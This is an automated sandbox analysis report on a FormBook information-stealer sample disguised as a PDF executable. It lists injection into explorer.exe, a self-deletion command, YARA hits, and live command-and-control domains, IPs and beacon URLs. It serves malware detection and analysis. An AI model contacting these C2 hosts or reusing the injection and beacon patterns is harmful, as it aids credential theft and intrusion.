          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033EB8D0 mov eax, dword ptr fs:[00000030h]8_2_033EB8D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033EB8D0 mov eax, dword ptr fs:[00000030h]8_2_033EB8D0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 206.189.174.29 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.xcash.fund
          Source: C:\Windows\explorer.exeNetwork Connect: 94.46.58.25 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.antiracismbyu.com
          Source: C:\Windows\explorer.exeDomain query: www.fabulousfalafel.com
          Source: C:\Windows\explorer.exeDomain query: www.capacitaciondelfuturo.com
          Source: C:\Windows\explorer.exeDomain query: www.maggionaossurvey.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.161.235 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.somht.com
          Source: C:\Windows\explorer.exeDomain query: www.michaelroberts.gallery
          Source: C:\Windows\explorer.exeNetwork Connect: 81.17.18.197 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.fenixforex.com
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.25 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.casinoflames.com
          Source: C:\Windows\explorer.exeDomain query: www.yyxingfa.com
          Source: C:\Windows\explorer.exeDomain query: www.verratjewelry.com
          Source: C:\Windows\explorer.exeNetwork Connect: 185.18.52.85 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 172.106.71.28 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.best10hostings.com
          Source: C:\Windows\explorer.exeNetwork Connect: 108.167.156.70 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 103.48.133.159 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.mantequillahub.pro
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeSection loaded: unknown target: C:\Users\user\Desktop\MV Sky Marine_pdf.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 3472Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeProcess created: C:\Users\user\Desktop\MV Sky Marine_pdf.exe 'C:\Users\user\Desktop\MV Sky Marine_pdf.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\MV Sky Marine_pdf.exe'Jump to behavior
          Source: explorer.exe, 00000004.00000002.509689637.0000000005EA0000.00000004.00000001.sdmp, wlanext.exe, 00000008.00000002.500098080.0000000005950000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000002.497194428.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000008.00000002.500098080.0000000005950000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000002.497194428.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000008.00000002.500098080.0000000005950000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000004.00000002.496367445.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000004.00000002.497194428.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000008.00000002.500098080.0000000005950000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000004.00000002.497194428.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000008.00000002.500098080.0000000005950000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 2_2_0040326F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,2_2_0040326F

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.275644751.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.275618923.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.496617029.0000000000F50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.496712195.0000000000F80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.235033668.0000000002670000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.1.MV Sky Marine_pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.MV Sky Marine_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.MV Sky Marine_pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.MV Sky Marine_pdf.exe.2670000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.MV Sky Marine_pdf.exe.2670000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.MV Sky Marine_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.275644751.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.275618923.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.496617029.0000000000F50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.496712195.0000000000F80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.235033668.0000000002670000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.1.MV Sky Marine_pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.MV Sky Marine_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.MV Sky Marine_pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.MV Sky Marine_pdf.exe.2670000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.MV Sky Marine_pdf.exe.2670000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.MV Sky Marine_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection412Virtualization/Sandbox Evasion3OS Credential DumpingSecurity Software Discovery231Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection412LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 372691 Sample: MV Sky Marine_pdf.exe Startdate: 22/03/2021 Architecture: WINDOWS Score: 100 31 www.rahasiasuksesbo.com 2->31 33 www.cvhrcm.com 2->33 35 rahasiasuksesbo.com 2->35 43 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 9 other signatures 2->49 11 MV Sky Marine_pdf.exe 12 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\lckp0.dll, PE32 11->29 dropped 59 Maps a DLL or memory area into another process 11->59 15 MV Sky Marine_pdf.exe 11->15         started        signatures6 process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Queues an APC in another process (thread injection) 15->65 18 explorer.exe 15->18 injected process9 dnsIp10 37 www.fenixforex.com 18->37 39 www.yyxingfa.com 103.48.133.159, 49730, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Hong Kong 18->39 41 14 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 22 wlanext.exe 18->22         started        signatures11 process12 signatures13 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          MV Sky Marine_pdf.exe33%VirustotalBrowse
          MV Sky Marine_pdf.exe23%ReversingLabsWin32.Trojan.Wacatac
          MV Sky Marine_pdf.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nssBDFE.tmp\lckp0.dll100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\nssBDFE.tmp\lckp0.dll17%ReversingLabsWin32.Trojan.Generic

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.1.MV Sky Marine_pdf.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.2.MV Sky Marine_pdf.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.MV Sky Marine_pdf.exe.2670000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          8.2.wlanext.exe.3867960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          8.2.wlanext.exe.c5de40.1.unpack100%AviraTR/Patched.Ren.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://hostnl03.fornex.host/404/img/favicon/favicon-32x32.png0%Avira URL Cloudsafe
          https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-57x57.png0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          https://hostnl03.fornex.host/404/img/logo0%Avira URL Cloudsafe
          https://hostnl03.fornex.host/404/img/logo-dark.png0%Avira URL Cloudsafe
          https://hostnl03.fornex.host/404/img/favicon/favicon-16x16.png0%Avira URL Cloudsafe
          https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-114x114.png0%Avira URL Cloudsafe
          http://www.casinoflames.com/m2be/?t8r=f9OOlDzSNjMkS+voKVj3JAm/FZou7FefMRO/dCbPYFE5jWEAY4Ie1mxxbA2c8ASh8bA/&1bYxT=mTfpcdW0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-120x120.png0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.michaelroberts.gallery/m2be/?t8r=3hs/fdpsiUpFetMliLQ5KTd9k1PXkNk579eBvZhq6Qtrn5Lx9iP8uWKZaCpCbSQvRdph&1bYxT=mTfpcdW0%Avira URL Cloudsafe
          www.capacitaciondelfuturo.com/m2be/0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-76x76.png0%Avira URL Cloudsafe
          https://hostnl03.fornex.host/404/img/favicon/favicon-128.png0%Avira URL Cloudsafe
          https://www.michaelroberts.gallery/m2be/?t8r=3hs/fdpsiUpFetMliLQ5KTd9k1PXkNk579eBvZhq6Qtrn5Lx9iP8uWK0%Avira URL Cloudsafe
          http://www.mantequillahub.pro/m2be/?t8r=ym0xxX00S0Wf+ixf12QOfxKttvR95wzAnITo9bxnjEKQPe2KXbpsv5dlZ+lGmtzP6AJs&1bYxT=mTfpcdW0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-60x60.png0%Avira URL Cloudsafe
          https://hostnl03.fornex.host/404/img/logo.png0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.capacitaciondelfuturo.com/m2be/?t8r=JuGytuw0I2CvsJrhKPqxcSs+eAHRIhMzmg6m2gZ2Sf/5EFBq1ZxzSrCArrcyEBWmu86q&1bYxT=mTfpcdW0%Avira URL Cloudsafe
          http://www.fenixforex.com/m2be/?t8r=0l3HkT4rKGRjwuaD6GRslzPylepCZX23oOXMbfcPML9ScCqaYm65vOxGdM+olqk7o7hp&1bYxT=mTfpcdW0%Avira URL Cloudsafe
          http://www.yyxingfa.com/m2be/?t8r=NWfrKKCiNqgfEu2gJcL26nowwYOKbN5UMUQLTML9o4O8a7GsheA9LuahVJ9lTMe/g8Lv&1bYxT=mTfpcdW0%Avira URL Cloudsafe
          https://hostnl03.fornex.host/404/img/favicon/mstile-150x150.png0%Avira URL Cloudsafe
          https://hostnl03.fornex.host/404/img/logo-dark0%Avira URL Cloudsafe
          https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-144x144.png0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          https://hostnl03.fornex.host/404/css/base.css0%Avira URL Cloudsafe
          https://hostnl03.fornex.host/404/img/favicon/mstile-310x310.png0%Avira URL Cloudsafe
          https://hostnl03.fornex.host/404/img/favicon/favicon-196x196.png0%Avira URL Cloudsafe
          https://hostnl03.fornex.host/404/img/favicon/mstile-70x70.png0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          https://hostnl03.fornex.host/404/img/icons/search.png0%Avira URL Cloudsafe
          https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-72x72.png0%Avira URL Cloudsafe
          https://hostnl03.fornex.host/404/img/prlx-bg-main.png0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.somht.com/m2be/?t8r=ifCDsBLKzPO1/caYwbP7ucLsNIzdB7eAVK9yl0hh16u0W5iMVAB6bdOGECjvY1n5rRJ4&1bYxT=mTfpcdW0%Avira URL Cloudsafe
          https://hostnl03.fornex.host/404/img/favicon/mstile-144x144.png0%Avira URL Cloudsafe
          https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-152x152.png0%Avira URL Cloudsafe
          https://hostnl03.fornex.host/404/img/favicon/mstile-310x150.png0%Avira URL Cloudsafe
          https://hostnl03.fornex.host/404/img/favicon/favicon-96x96.png0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          yjmanks.sitelockcdn.net
          		108.167.156.70
          		truetrue
            		unknown
            www.casinoflames.com
            		94.46.58.25
            		truetrue
              		unknown
              www.yyxingfa.com
              		103.48.133.159
              		truetrue
                		unknown
                michaelroberts.gallery
                		192.0.78.25
                		truetrue
                  		unknown
                  rahasiasuksesbo.com
                  		180.235.151.22
                  		truetrue
                    		unknown
                    www.capacitaciondelfuturo.com
                    		172.67.161.235
                    		truetrue
                      		unknown
                      antiracismbyu.com
                      		206.189.174.29
                      		truetrue
                        		unknown
                        www.maggionaossurvey.com
                        		81.17.18.197
                        		truetrue
                          		unknown
                          www.somht.com
                          		172.106.71.28
                          		truetrue
                            		unknown
                            www.mantequillahub.pro
                            		185.18.52.85
                            		truetrue
                              		unknown
                              www.xcash.fund
                              		unknown
                              		unknowntrue
                                		unknown
                                www.antiracismbyu.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.fabulousfalafel.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.michaelroberts.gallery
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.fenixforex.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.rahasiasuksesbo.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.verratjewelry.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.cvhrcm.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.best10hostings.com
                                              		unknown
                                              		unknowntrue
                                                		unknown

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.casinoflames.com/m2be/?t8r=f9OOlDzSNjMkS+voKVj3JAm/FZou7FefMRO/dCbPYFE5jWEAY4Ie1mxxbA2c8ASh8bA/&1bYxT=mTfpcdWtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.michaelroberts.gallery/m2be/?t8r=3hs/fdpsiUpFetMliLQ5KTd9k1PXkNk579eBvZhq6Qtrn5Lx9iP8uWKZaCpCbSQvRdph&1bYxT=mTfpcdWtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                www.capacitaciondelfuturo.com/m2be/true
                                                • Avira URL Cloud: safe
                                                		low
                                                http://www.mantequillahub.pro/m2be/?t8r=ym0xxX00S0Wf+ixf12QOfxKttvR95wzAnITo9bxnjEKQPe2KXbpsv5dlZ+lGmtzP6AJs&1bYxT=mTfpcdWtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.capacitaciondelfuturo.com/m2be/?t8r=JuGytuw0I2CvsJrhKPqxcSs+eAHRIhMzmg6m2gZ2Sf/5EFBq1ZxzSrCArrcyEBWmu86q&1bYxT=mTfpcdWtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.fenixforex.com/m2be/?t8r=0l3HkT4rKGRjwuaD6GRslzPylepCZX23oOXMbfcPML9ScCqaYm65vOxGdM+olqk7o7hp&1bYxT=mTfpcdWtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.yyxingfa.com/m2be/?t8r=NWfrKKCiNqgfEu2gJcL26nowwYOKbN5UMUQLTML9o4O8a7GsheA9LuahVJ9lTMe/g8Lv&1bYxT=mTfpcdWtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.somht.com/m2be/?t8r=ifCDsBLKzPO1/caYwbP7ucLsNIzdB7eAVK9yl0hh16u0W5iMVAB6bdOGECjvY1n5rRJ4&1bYxT=mTfpcdWtrue
                                                • Avira URL Cloud: safe
                                                		unknown

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://fornex.com/dedicated/wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://hostnl03.fornex.host/404/img/favicon/favicon-32x32.pngwlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designersGexplorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpfalse
                                                    		high
                                                    https://fornex.com/help/transfer-site/wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-57x57.pngwlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers/?explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.founder.com.cn/cn/bTheexplorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://hostnl03.fornex.host/404/img/logowlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://hostnl03.fornex.host/404/img/logo-dark.pngwlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://fornex.com/vpn/wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://www.fontbureau.com/designers?explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpfalse
                                                            		high
                                                            https://hostnl03.fornex.host/404/img/favicon/favicon-16x16.pngwlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-114x114.pngwlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://fornex.com/wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://www.tiro.comexplorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designersexplorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpfalse
                                                                		high
                                                                https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-120x120.pngwlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.goodfont.co.krexplorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.sajatypeworks.comexplorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://fornex.com/help/cpanel-first-steps/wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.typography.netDexplorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.founder.com.cn/cn/cTheexplorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://fontfabrik.comexplorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://fornex.com/my/tickets/wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-76x76.pngwlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://hostnl03.fornex.host/404/img/favicon/favicon-128.pngwlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.michaelroberts.gallery/m2be/?t8r=3hs/fdpsiUpFetMliLQ5KTd9k1PXkNk579eBvZhq6Qtrn5Lx9iP8uWKwlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
